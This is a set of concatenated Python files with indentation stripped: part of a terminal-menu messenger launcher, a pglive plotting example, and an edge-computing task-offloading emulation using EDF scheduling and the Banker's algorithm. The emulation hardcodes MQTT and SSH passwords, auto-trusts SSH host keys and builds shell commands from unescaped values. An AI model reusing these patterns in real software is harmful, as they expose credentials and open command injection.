print(backcolor+' '*2+menucolor+lcol+'┌'+tblack+name+tres+'\033[39m'+'─'*namelengh+lcol+'┐'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+text[0:40]+tres+' '*len_desc1+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+text[40:80]+tres+' '*len_desc2+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+text[80:120]+tres+' '*len_desc3+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
if sel == 0:
print(backcolor+' '*2+menucolor+lcol+'│ '+selcolor+tblack+abut+tres+menucolor+' '*blen+tblack+bbut+tres+lcol+' │'+tres+backcolor+' '*2+'\033[49m')
else:
print(backcolor+' '*2+menucolor+lcol+'│ '+tres+tblack+abut+tres+' '*blen+tblack+selcolor+bbut+tres+menucolor+lcol+' │'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'└'+'─'*44+'┘'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+'\033[34m'+'.'*50+'\033[49m'+'\033[39m')
x = keyboard.read_key(sup)
if keyboard.is_pressed('left'):
sel -= 1
if keyboard.is_pressed('right'):
sel += 1
if keyboard.is_pressed('enter'):
done = True
return sel
while keyboard.is_pressed(x):
pass
os.system('cls')
# LOL
# Ask for Server Listserver or Client
pts = smenu.styl_menu_vert(name = 'JuNi\'s Messenger', entrys=['Client', 'Server', 'List Server'], description= ['Starts the Client of the Messenger to receive and send Messages.', 'Starts the Server for the Messenger in order for clients to send messages to each other.', 'Starts the List Server which is a server list host, as the name suggests, and is good for listing servers and their IPs.'])
# Client Route
if pts == 0:
serveri = smenu.custom_input_menu(name='Messenger', entrys=['Server IP:', 'Server P:'], prompt = 'Please answer the questions below:', default_vals=['','4242'], description=['The IP of the server you want to connect to.', 'The Port of the server you want to connect to. Leave as it is if you don\'t have a port.'])
usrcrd = smenu.custom_input_menu(name='Messenger', entrys=['User Name:', 'Password: '], prompt = 'Please answer the questions below:', default_vals=[os.getlogin(),''], description=['Your User Name that will be displayed on the Server','The Password for the Server, Leave blank if you don\'t need it.'])
if 'Windows' in platform.system():
batfile = smenu.prompt(name='Messenger',text='Do you want to create a Batch file? It can later be used to quickly start the messenger with the settings you just entered', abut='No', bbut='Yes')
else:
batfile = smenu.prompt(name='Messenger',text='Do you want to create a Bash file? It can later be used to quickly start the messenger with the settings you just entered', abut='No', bbut='Yes')
# Get Vars set up
server_IP= serveri[0]
server_P = serveri[1]
usrn = usrcrd[0]
if not usrcrd[1] == '':
batpw = ' -pw '+ usrcrd[1]
pw = usrcrd[1]
else:
batpw = ''
pw = ''
if batfile == 1:
batfname = smenu.custom_input_menu(name='Messenger', entrys=['File Name:'], prompt = 'Please input the File Name:', default_vals=[os.getlogin()+'\'s_messenger'], description=['The name of the Messenger "Profile" File.'])
if 'Windows' in platform.system():
f = open('C:\\Users\\'+os.getlogin()+'\\Desktop\\'+batfname[0]+'.bat', 'w')
f.write('python '+os.path.dirname(os.path.realpath(__file__))+'\\'+pathlib.Path(__file__).name+' -c -ip '+server_IP+' -p '+server_P+' -u '+usrn+batpw)
f.close()
else:
f = open(os.path.dirname(os.path.realpath(__file__))+'/'+batfname[0]+'.sh', 'w')
f.write('#!/bin/bash\npython3 '+os.path.dirname(os.path.realpath(__file__))+'/'+pathlib.Path(__file__).name+' -c -ip '+server_IP+' -p '+server_P+' -u '+usrn+batpw)
f.close()
# Server Route
if pts == 1:
srvcrd = smenu.custom_input_menu(name='Messenger Server', entrys=['Server Port: ', 'Server Password:'], prompt = 'Please answer the questions below:', default_vals=['4242',''], description=['The Server Port that the clients will connect to','The Password for the Server, Leave blank if you don\'t want one. Every Client has to enter this'])
if smenu.prompt(name='Messenger Server',text='Do you want to enable Server Listing? This will send some information to the List Server so your server will be easier to find. (No listing of PW or USRNs)', abut='No', bbut='Yes') == 1:
pass
else:
sls = ''
# List Server Route
|
update_rate.py
|
import pglive.examples_pyqt6 as examples
from math import ceil
from threading import Thread
import pyqtgraph as pg
from pglive.sources.data_connector import DataConnector
from pglive.sources.live_plot import LiveHBarPlot
from pglive.sources.live_plot_widget import LivePlotWidget
"""
In this example, different update rates are demonstrated.
Four plots are displayed, each running at 1/4 of the previous plot's update rate.
The update rate is set in Hz.
"""
layout = pg.LayoutWidget()
args = []
# Initial rate of 100Hz
update_rate = 100
max_len = 600
# Initial delta Y is 1
bar_height = 1
for index in range(4):
widget = LivePlotWidget(title=f"Horizontal Bar Plot @ {update_rate}Hz")
plot = LiveHBarPlot(bar_height=bar_height, brush="green", pen="green")
widget.addItem(plot)
layout.addWidget(widget)
args.append(DataConnector(plot, max_points=ceil(max_len), update_rate=update_rate))
# divide all important parameters by 4
update_rate /= 4
max_len /= 4
# bar height depends on Y distance, that's why we should multiply it by 4
# if we leave it at 1, we get smaller bars
bar_height *= 4
layout.show()
Thread(target=examples.sin_wave_generator, args=args).start()
examples.app.exec()
examples.stop()
|
algo_two.py
|
from functools import reduce
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
import argparse
import pickle
import logging
current_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(current_path)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(name)s:%(message)s')
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list], {wait_time}] => records tasks re-offloaded to the MEC for execution.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
thread_record = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
shared_resource_lock = threading.Lock()
t_track = 1
def ping(host):
cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
# cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
cmd = ['ifconfig ens4 | grep inet | head -n 1 | cut -d "t" -f 2 | cut -d " " -f 2']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
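# Worked example: for the periods listed in _tasks above (20, 5, 10, 10, 15)
# the least common multiple is 60, which edf() below uses as its scheduling
# hyperperiod.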
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# logger.info("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
logger.info('sending stop alert')
run = 0
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
logger.info('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
total_received_task = 0
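# edf() builds every job instance of every task over one hyperperiod, sorts
# the instances by absolute deadline and schedules them earliest-deadline-first;
# instances whose wcet no longer fits before their deadline are reported as
# missed and handed to cooperative_mec() for offloading.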
def edf():
global total_received_task
t_lcm = lcm([tasks[i]['period'] for i in tasks])
t_dead = {i: tasks[i]['deadline'] for i in tasks}
sorted_dead = sorted(t_dead.items(), key=lambda kv: (kv[1], kv[0]))
# logger.info(sorted_dead)
ready_task = []
for i in sorted_dead:
period = tasks[i[0]]['period']
# logger.info('lcm: ', t_lcm, ' period: ', period)
t_range = int(t_lcm / period)
last_dead = 0
for j in range(t_range):
ready_task.append((i[0], last_dead + tasks[i[0]]['deadline']))
last_dead += period
ready_task = sorted(ready_task, key=lambda t: t[1])
logger.info(str(ready_task))
t_time_ = 0
schedule = []
missed = []
register = {i: 0 for i in tasks.keys()} # {ti : amount executed}
for i in ready_task:
if (t_time_ // tasks[i[0]]['period']) + 1 <= register[i[0]]:
while (t_time_ // tasks[i[0]]['period']) + 1 <= register[i[0]]:
t_time_ += 1
# schedule.append(('idle', t_time))
if (t_time_ // tasks[i[0]]['period']) + 1 > register[i[0]]:
if t_time_ + tasks[i[0]]['wcet'] <= i[1]:
register[i[0]] += 1
t_time_ += tasks[i[0]]['wcet']
schedule.append(i[0])
else:
logger.info(f'Deadline missed: {i}')
missed.append(i[0])
# logger.info('s : ', schedule)
# logger.info('r: ', register)
if len(missed) > 0:
# logger.info('missed deadline: ', missed)
cooperative_mec(missed)
_edf_ = task_time_map(schedule, tasks)
total_received_task += len(_edf_)
return _edf_
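# Summary (added for clarity): edf() expands each periodic task into job instances
# over one hyperperiod (lcm of the periods), orders them by absolute deadline and
# schedules them non-preemptively; jobs that cannot complete their wcet before
# their deadline are collected in `missed` and handed to cooperative_mec().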
# generate execution sequence
def is_safe(processes, avail, _need_, allot, p): # bankers algorithm
need = [_need_[i] for i in _need_]
_allot_ = [allot[i] for i in allot]
    # tasks to be offloaded if a safe state cannot be reached
offload = []
# Number of resources
res = 3
# Mark all processes as unfinished
finish = [0] * p
# To store safe sequence
safe_seq = [0] * p
# Make a copy of available resources
work = [0] * res
for i in range(res):
work[i] = avail[i]
# While all processes are not finished
# or system is not in safe state.
count = 0
while count < p:
# Find a process which is not finish
# and whose needs can be satisfied
# with current work[] resources.
found = False
for t in range(p):
# First check if a process is finished,
# if no, go for next condition
if finish[t] == 0:
                # Check whether every resource need of the current
                # process can be met by the available work[] resources.
                if all(need[t][j] <= work[j] for j in range(res)):
# Add the allocated resources of
# current P to the available/work
# resources i.e.free the resources
for k in range(res):
work[k] += _allot_[t][k]
# Add this process to safe sequence.
safe_seq[count] = processes[t]
count += 1
# Mark this p as finished
finish[t] = 1
found = True
# If we could not find a next process
# in safe sequence.
if not found:
logger.info("System is not in safe state")
a = list(set(processes) - set(safe_seq) - set(offload))
_max = np.array([0, 0, 0])
n = {}
for i in a:
n[i] = sum(allocation[i[:2]])
_max = max(n, key=n.get)
# logger.info('work: ', work, 'need: ', _need[_max[:2]])
offload.append(_max)
work = np.array(work) + np.array(allocation[_max[:2]])
count += 1
# Mark this p as finished
finish[processes.index(_max)] = 1
found = True
# If system is in safe state then
# safe sequence will be as below
if len(offload) > 0:
safe_seq = safe_seq[:safe_seq.index(0)]
logger.info(f'offloading tasks: {offload}')
cooperative_mec(offload)
deadlock[0] += 1
logger.info(f'safe seq: {safe_seq}')
return safe_seq
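# Note (added for clarity): is_safe() is the Banker's safety check with an
# offloading twist: when no remaining process fits the available resources, the
# process holding the largest allocation is marked for offloading, its resources
# are reclaimed into work[], and the search continues so the rest of the workload
# can still be ordered into a safe sequence.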
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# logger.info('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return is_safe(processes, avail, n_need, allot, p)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
    # broadcast waiting time = (total waiting time) / 2; using the full average waiting time might be too tight
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
timed_out_tasks = 0
def compare_local_mec(list_seq):
global received_time, timed_out_tasks
execute_mec = []
execute_locally = []
diff = time.time() - received_time.pop(0)
checking_times = {}
for i in list_seq:
t_time[i.split('_')[0]][1] -= diff
# if t_time[i.split('_')[0]][1] < 0:
# _client.publish(i.split('_')[0].split('.')[2], str({i.split('_')[0]: get_time() + ['local']}), )
# timed_out_tasks += 1
if t_time[i.split('_')[0]][1] > list_seq[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
checking_times[i] = {'Latency': t_time[i.split('_')[0]][1], 'Expected_exec_time': list_seq[i]}
logger.info(f'Execution time comparison:= {checking_times}')
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
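# Worked example (added; illustrative only): with two samples already recorded and
# a last stored value of 0.30, a new sample a1 = 0.60 gives
#   avg = ((3 - 1) * 0.30 + 0.60) / 3 = 0.40
# i.e. the cumulative-average recurrence mu_n = ((n - 1) * mu_(n-1) + x_n) / n with
# the most recently stored value taken as mu_(n-1).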
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
logger.info('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
logger.info(str(e))
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
logger.info('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# logger.info('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
                        address[0]))  # calculate moving average of MEC wait time => w_time = advertised wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
    # return the MEC host with the smallest last-reported waiting time, or 0 if none has reported yet
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
logger.info('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
            if np.all(np.greater_equal(_max, _need[j[:2]])):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
logger.info('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
logger.info('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
logger.info('\n=========SENDING {} TO CLOUD==========='.format(i))
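# Decision summary (added for clarity): cooperative_mec() sends a task to the cloud
# when no peer MEC has advertised a waiting time; otherwise it offloads to the
# least-loaded MEC when the task's resource needs fit and either that MEC's waiting
# time is below the task's latency budget or its RTT beats the cloud's RTT; in all
# other cases the task falls back to the cloud.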
outward_mec = 0
offload_check = []
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
if len(exec_list) != len(offloaded_task[0]):
# logger.info('\n\n', '@ ' * 50)
logger.info(f'exec: {exec_list} off: {offloaded_task[0]}')
# logger.info('\n\n', '@ ' * 50)
offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in exec_list: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# logger.info('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
logger.info(f'\nExecuting : {local}')
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
logger.info('#{}'.format(local.index(i) + 1) + f' Executed: {i}')
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
# if j.split('.')[1] != node_id:
# send_offloaded_task_mec('{} {}'.format(j.split('.')[1], j))
# outward_mec += 1
# elif j.split('.')[1] == node_id:
# # send_client({j: get_time()}, send_back_host)
# _client.publish(j.split('.')[2], str({j: get_time()+['local']}), )
# count_task_sent(j)
# else:
# logger.info('else execute: ', j)
logger.info('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
logger.info('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
logger.info('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list
while True:
if stop():
logger.info('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results edf+bankers {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
logger.info("Email sent!")
except Exception as e:
logger.info(str(e))
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
logger.info(str(e))
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
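# Illustration (added; not part of the original code): mec_id() zero-pads the last
# octet of an IP address to three digits, e.g. mec_id('192.168.1.5') -> '005' and
# mec_id('192.168.1.45') -> '045'; this string doubles as the node's MQTT topic id
# subscribed to in on_connect().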
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
c.close()
except Exception as e:
logger.info(str(e))
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_3_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_3_{mec_no} = {mec_rtt} \ncpu{_id_}_3_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_3_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_3_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_3_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_3_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_3_{mec_no} = {deadlock} \nmemory{_id_}_3_{mec_no} = {memory}" \
f"\ntask_received{_id_}_3_{mec_no} = {total_received_task} \nsent_t{_id_}_3_{mec_no} = {clients_record}" \
f"\ncooperate{_id_}_3_{mec_no} = {cooperate} \ntask_record{_id_}_3_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_3_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_3_{mec_no} = {offload_check}\n" \
f"\ntimed_out_tasks{_id_}_3_{mec_no} = {timed_out_tasks}\n"
list_result = [
f"\nwt{_id_}_3_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_3_{mec_no} = {mec_rtt} \ncpu{_id_}_3_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_3_{mec_no} = {_off_mec} \noff_cloud{_id_}_3_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_3_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_3_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_3_{mec_no} = {deadlock} \nmemory{_id_}_3_{mec_no} = {memory}",
f"\ntask_received{_id_}_3_{mec_no} = {total_received_task} \nsent_t{_id_}_3_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_3_{mec_no} = {cooperate} \ntask_record{_id_}_3_{mec_no} = {task_record} ",
f"\noutward_mec{_id_}_3_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_3_{mec_no} = {offload_check}\n",
f"\ntimed_out_tasks{_id_}_3_{mec_no} = {timed_out_tasks}"
]
file_ = open(f'{_id_}_3_{mec_no}datap.py', 'w')
for i in list_result:
file_.write(i)
file_.close()
cmd = f'mv {_id_}_3_{mec_no}datap.py {send_path}'
os.system(cmd)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
run = 1  # main-loop flag; set to 0 when a 'stop' message arrives from the broker (see on_message)
def start_loop():
global _loc
global tasks
global t_time
global node_id
global run
logger.info('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# logger.info('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
logger.info('algorithm is starting....')
while run == 1:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
logger.info(f'EDF List of Processes: {tasks}\n')
logger.info('\n========= Running Deadlock Algorithm ===========')
list_seq = get_exec_seq(edf())
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
logger.info(f'\nWaiting Time List: {wait_list}')
compare_result = compare_local_mec(wait_list)
logger.info(f'\nExecute Locally: {compare_result[1]}')
_loc += len(compare_result[1]) # total number of tasks to be executed locally
logger.info(f'\nExecute in MEC: {compare_result[0]}')
if len(compare_result[0]) > 0:
logger.info('\nSending to cooperative platform')
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(0.4)
except KeyboardInterrupt:
logger.info('\nProgramme Terminated')
            stop = True  # signal the worker threads to exit
